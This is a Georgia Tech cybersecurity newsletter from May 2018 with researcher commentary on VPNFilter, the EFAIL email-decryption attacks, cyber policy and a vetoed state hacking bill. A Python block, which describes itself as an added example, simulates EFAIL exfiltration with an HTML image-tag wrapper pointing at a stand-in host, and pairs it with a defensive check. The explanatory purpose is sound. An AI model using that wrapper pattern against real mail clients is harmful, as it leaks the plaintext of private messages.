Cybersecurity News & Commentary - May 2018

The Source Port is Georgia Tech's monthly cybersecurity newsletter, featuring commentary from its researchers about topics in the news over the past month, what wasn't written between the lines, the big (and sometimes nagging) questions driving our research, and new projects underway.

May 31, 2018


Why an EU-U.S. Agreement Still Is Needed for Cybercrime Investigations

Already, 2018 has been a blockbuster for new privacy and data access laws. Following the implementation of the General Data Protection Regulation (GDPR) in the European Union and the CLOUD Act in the United States, an agreement is still lacking between international governments that would facilitate the collection and transfer of cybercrime evidence overseas. Peter Swire and co-author Jennifer Daskal explore whether the CLOUD Act allows the United States to forge executive agreements with the EU as a whole or whether negotiations must proceed country-by-country. After describing the legal requirements under U.S. and EU law, the authors propose a framework to resolve important issues for obtaining cybercrime evidence from another country...

Read the full piece by Peter Swire, associate director of policy for the Institute for Information Security & Privacy.


New Malware 'VPNFilter' Takes Advantage of Three Convenient Truths

Cisco Systems' Talos cybersecurity team unearthed a new piece of malware that targets network devices. Dubbed VPNFilter, after the name of a directory the malware creates on affected systems, it takes advantage of known vulnerabilities and default credentials on (primarily) routers and network storage devices to install itself and download its monetization components. Attackers managed to deploy the malware on an estimated 500,000 to 1 million small office/home office (SOHO) and home devices worldwide. Although the intent of the attack has not been fully determined, the malware appears to have several malicious components the attackers can exploit. One of the most significant concerns is a piece of code in the malware used to monitor network traffic and SCADA devices.


IISP Analyst Panagiotis Kintis: "An incredibly large number of Internet-connected devices are in homes, maintaining almost 100% uptime. After the Mirai botnet, which managed to render Distributed Denial of Service (DDoS) attacks on a massive scale, we see more and more attackers trying to take advantage of our fridges, our microwaves, our TVs, our cars... I can easily see three reasons why I would have shifted to those if I were the attacker: (1) the number of Internet-connected devices keeps rising, with cheap devices purchased all the time to make our lives easier; (2) the user sets the device up once and then forgets about it -- few will ever go back and 'log on' to a fridge to update its firmware; (3) users have proven their dislike of strong passwords and credentials.

That is what the attackers behind VPNFilter were betting on and the report from Talos shows that they were right. One would think that in 2018, after so many years of security best practices, advertisements, manuals, and instructions, users would have understood the importance of changing the default password on their router, or installing updates on their NAS devices. Apparently, hundreds of thousands of users did not really pay attention, leaving their equipment vulnerable to trivial attacks. Sofacy Group, the (alleged) hacking group behind VPNFilter, built a very sophisticated and modular piece of malware, which they were able to deploy almost effortlessly. The malware allows attackers to change its functionality at will, downloading different modules that can be used to monetize devices in seemingly any way possible.

Once again, I will not blame the users. The users will do whatever is simple and efficient for them. Checking if a default password even exists and changing it can be challenging even for tech-savvy people. The real question is: why is there a default password on a device in 2018? We have so many ways to authenticate users and devices today that I find it really hard to believe that the one-time cost of implementing secure authentication is unbearable for Fortune 500 companies. Moreover, with so many smart devices appearing in households every time, we (the security community) have a great responsibility of assisting users towards a more secure network. We need ways to identify these devices, evaluate their security level, and understand the risks those devices pose.

Thankfully, the security community and the authorities collaborated adequately and promptly to devise a strategy before VPNFilter could cause more damage. The FBI took over a domain name used by the malware as the command and control (CnC) channel, rendering its persistence impossible. Users now are advised to reboot their devices and the malware will not be able to update itself. At the same time, the authorities will be able to pinpoint the devices that had been compromised and assist with the remediation process."


A Top Cyber Post Goes Vacant

The National Security Council made the decision not to replace the departing Rob Joyce, the first White House Cybersecurity Coordinator for the Trump administration, who left the position to return to the intelligence community. Since assuming office in April, National Security Advisor John Bolton has taken the opportunity to make staffing changes to the National Security Council; the Cybersecurity Coordinator position will ostensibly be consolidated with other roles into a new position. Opposition to this move prompted 19 Democratic Senators to write a letter to Bolton requesting that he reconsider his decision, as the position is critical to the well-being of a holistic national network defense.


IISP Analyst Holly Dragoo: "When the first White House Cybersecurity Coordinator hit the scene in 2009 under the Obama administration, I was initially very skeptical – 'Do we really need another bureaucrat? How could this "outsider" suitably brief/know/act on anything cyber well enough to truly inform the President?' Since that time, I've converted. Now, with no single agency in charge of herding the cyber-cat stakeholders, and so much money and power dynamically swirling around all things 'cyber' these days, to eliminate the position is very short-sighted and suggests a dated way of thinking. It is 2018. Coordinating cybersecurity at the national level is a full-time job, and eliminating it signals to adversaries that we're not fully committed to the topic."


The Lessons Behind an Attack that Decodes Encrypted Email

A team of researchers in Germany and Belgium has just released a paper that describes ways for an attacker to recover the plaintext of encrypted emails. Not only does the class of attacks presented in the paper work against the popular PGP and S/MIME encryption schemes, but it also works against multiple email clients, including Outlook, Apple Mail, and Gmail. To decrypt an intercepted email, an attacker need only craft a new email to the recipient that embeds the encrypted email in a clever way that tricks vulnerable email clients into sending the plaintext of the original message back to the attacker. The research paper will be presented at the 27th USENIX Security Symposium in Baltimore in August.


IISP Analyst Joel Odom: "Let's admit it. Few people use encrypted email. Email security is better than it used to be because we've started using encryption for many of the hops and stops that email makes as it traverses the internet from Alice to Bob, but end-to-end encryption for email is rare. The reason I chose this story to write about is not because it's a flaw that will drastically impact society, but because it's a fascinating study in how security fails in unexpected ways. This class of attacks exploits a systemic design flaw rather than a nuanced technical flaw.

How do these attacks work? Suppose that Alice sends an encrypted email message to Bob, which is intercepted by our attacker, Eve. Perhaps Eve intercepts the encrypted message by network sniffing, or perhaps Eve is a sneaky system administrator who can access the encrypted message saved on a server. The point is that the message is encrypted by Alice precisely because there are many ways to capture it as it makes its way to Bob.

In the first variant of the attack, Eve crafts a new email message to Bob in HTML format. This HTML message includes a link to a non-existent image whose pseudo location is partly specified by the encrypted message that Eve is trying to decrypt. When Bob's email client processes the specially-crafted message from Eve, the client encounters the nested encrypted message from Alice and happily decrypts the message using Bob's keys. Having been tricked into thinking that the decrypted message specifies the location of an image to fetch, the client reaches out to Eve for the image and presents Eve the decrypted message in the process.

But, wait! There's more. The paper also describes a second, similar attack whereby Eve can modify the plaintext of the encrypted message from Alice to Bob by making certain clever changes to the ciphertext. This is an application of a known problem with unauthenticated encryption schemes. Eve's modification inserts HTML elements into the message that trick the email client into sending Eve the plaintext of the entire message using a mechanism similar to the first variant described above. (My understanding is that there are optional authenticated modes of encryption available for PGP and S/MIME that I expect would mitigate this attack.)

So what are the lessons here? First, complexity is the enemy of security. HTML is a complex markup language that presents a lot of attack surface for exploitation. Second, attackers can cheat. Eve never actually broke the encryption on the message, she just tricked Bob's e-mail client into decrypting it for her. Third, encryption requires authentication. There are entire classes of attacks that can be prevented by requiring encryption schemes to check the integrity of a message before decrypting it."
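The first variant described in the commentary above comes down to a rendering decision: whether a mail client splices a decrypted MIME part into the HTML of the parts around it. The following added example (not code from the newsletter or from the paper's authors) simulates a naive client that concatenates parts against a hardened one that renders each part as its own document, and includes a simple check a client could apply to an HTML part that ends inside an open tag. The parts, the host `example.invalid`, and the plaintext are all constructed for the demonstration.

```python
# Added example: why a decrypted MIME part must not be merged into the
# surrounding HTML, and a heuristic check for parts that end mid-tag.
# Everything here is a simulation; no real mail client or crypto is involved.
from html.parser import HTMLParser


class ImgSrcCollector(HTMLParser):
    """Collect every <img src=...> URL that a renderer would try to fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.urls.append(value)


def remote_fetches(html):
    """Return the image URLs an HTML renderer would request for one document."""
    collector = ImgSrcCollector()
    collector.feed(html)
    collector.close()
    return collector.urls


def render_concatenated(parts):
    """Naive client: all (already decrypted) parts are joined into one document,
    so an attribute opened in one part can swallow the text of the next."""
    return remote_fetches("".join(parts))


def render_isolated(parts):
    """Hardened client: each part is parsed as its own document, so a tag that
    is left open in one part cannot absorb the plaintext of another."""
    urls = []
    for part in parts:
        urls.extend(remote_fetches(part))
    return urls


def ends_inside_open_tag(html):
    """Heuristic: an HTML part whose last '<' comes after its last '>' ends
    mid-tag and would wrap whatever follows it into that tag."""
    return html.rfind("<") > html.rfind(">")


# Constructed sample message: two wrapper parts around one decrypted part.
PARTS = [
    '<img src="http://example.invalid/collect?d=',  # constructed wrapper part
    "Meet me at the usual place at noon.",          # constructed decrypted part
    '">',                                           # constructed wrapper part
]
```

Run `render_concatenated(PARTS)` and `render_isolated(PARTS)` to compare: only the concatenating renderer produces a URL that carries the decrypted text, and `ends_inside_open_tag(PARTS[0])` flags the wrapper part before any rendering happens.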


Georgia Vetoes Hacking Bill... For Now

Georgia Governor Nathan Deal vetoed State Senate Bill 315, the so-called "computer snooping" bill, which would have made it illegal to access digital networks without permission. Aimed originally at deterring hacker activity with fines and misdemeanor charges, the law potentially would have negatively affected businesses whose sole focus is to look for security flaws to improve network defense. In a statement, Governor Deal said he hoped the authors of the bill could produce a new draft that strikes a balance between national security, data privacy, and technology business development.


IISP Analyst Holly Dragoo: "The bill itself, and how far it managed to go in the legislative process, is an indicator of how little lawmakers understand about cyber network intrusions. Hackers, by definition, are present on networks without authorized access. As a remotely accessed crime (executed from literally most anywhere in the world) it's hard to imagine a hacker being deterred by a $5,000 fine, or a state misdemeanor in the state of Georgia, let alone even being aware of the local law. While the veto is quite a victory for the tech industry, it's not clear whether they are out of the woods yet. Next year's legislative session will see a new Governor presiding over the veto pen."